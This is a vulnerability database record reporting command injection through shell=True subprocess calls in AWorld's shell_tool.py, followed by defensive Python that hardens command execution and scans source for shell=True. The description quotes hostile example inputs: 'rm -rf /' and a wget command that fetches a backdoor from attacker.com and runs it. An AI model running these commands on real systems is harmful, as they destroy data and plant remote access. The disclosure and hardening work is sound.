| Field | Value |
|---|---|
| Title | inclusionAI AWorld 0.0 Command Injection |
| Description | AWorld is a tool designed for building, evaluating, and running General Multi-Agent Assistance. However, it contains a critical security vulnerability in the file `AWorld/aworld/virtual_environments/terminals/shell_tool.py`. The vulnerability is of the type CWE-78: OS Command Injection. The code in this file makes use of the `subprocess.run()` and `subprocess.Popen()` functions to execute user-input commands. The concerning aspect is that the `shell` parameter in these functions is set to `True`. In the `execute` method, when `capture_output` is `True`, `subprocess.run()` is called with `shell=True`, and when `capture_output` is `False`, `subprocess.Popen()` is called with `shell=True`. Similarly, the `execute_async` method also calls `subprocess.Popen()` with `shell=True`. This setting allows an attacker to inject malicious commands through user input. For instance, if an attacker supplies input like `rm -rf /` in a scenario where the application accepts user shell commands, the malicious command will be executed by the system. In more sophisticated attacks, an attacker could inject commands to download and execute a backdoor script from a remote server, such as `; wget http://attacker.com/backdoor.sh && sh backdoor.sh`, which can lead to unauthorized access and further malicious activities. More details: https://github.com/inclusionAI/AWorld/issues/38 |
| Source | https://github.com/inclusionAI/AWorld/issues/38 |
| User | ybdesire (UID 83239) |
| Submission | 16.04.2025 05:41 (12 months ago) |
| Moderation | 28.04.2025 07:56 (12 days later) |
| Status | Accepted |
| VulDB Entry | 306395 [inclusionAI AWorld up to 8c257626e648d98d793dd9a1a950c2af4dd84c4e shell_tool.py subprocess.run/subprocess.Popen privilege escalation] |
| Points | 20 |
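The record above describes `execute`/`execute_async` handing user text to `subprocess` with `shell=True`. The following is an added example, not AWorld's own code: a hardened replacement that tokenises with `shlex`, checks `argv[0]` against a hypothetical allowlist and runs with `shell=False`, plus a small `ast`-based audit that flags `subprocess` calls passing `shell=True` in a constructed source sample mirroring the reported pattern.

```python
import ast
import shlex
import subprocess

# Hypothetical allowlist of programs the tool may launch (assumption for this example).
ALLOWED_COMMANDS = {"echo", "ls", "cat"}


def execute_hardened(command: str) -> str:
    """Tokenise with shlex, allowlist argv[0], run with shell=False.

    Without a shell, ';', '&&' and '|' are plain argv entries: 'echo hi; id'
    runs echo with the arguments ['hi;', 'id'] rather than two commands.
    """
    argv = shlex.split(command)
    if not argv:
        raise ValueError("empty command")
    if argv[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"command not allowed: {argv[0]!r}")
    completed = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return completed.stdout


def find_shell_true(source: str) -> list[int]:
    """Return sorted line numbers of subprocess.<fn>(..., shell=True) calls."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        # Only look at attribute calls on the name `subprocess`.
        if not (isinstance(node.func.value, ast.Name) and node.func.value.id == "subprocess"):
            continue
        if node.func.attr not in {"run", "Popen", "call", "check_call", "check_output"}:
            continue
        for kw in node.keywords:
            if kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                hits.append(node.lineno)
    return sorted(hits)


# Constructed sample mirroring the execute/execute_async pattern in the report.
SAMPLE_SOURCE = """\
import subprocess
def execute(cmd, capture_output):
    if capture_output:
        return subprocess.run(cmd, shell=True, capture_output=True)
    return subprocess.Popen(cmd, shell=True)
def execute_async(cmd):
    return subprocess.Popen(shlex.split(cmd))
"""
```

`find_shell_true(SAMPLE_SOURCE)` reports lines 4 and 5, and `execute_hardened("echo hi; id")` returns `"hi; id\n"` because no shell ever parses the `;`.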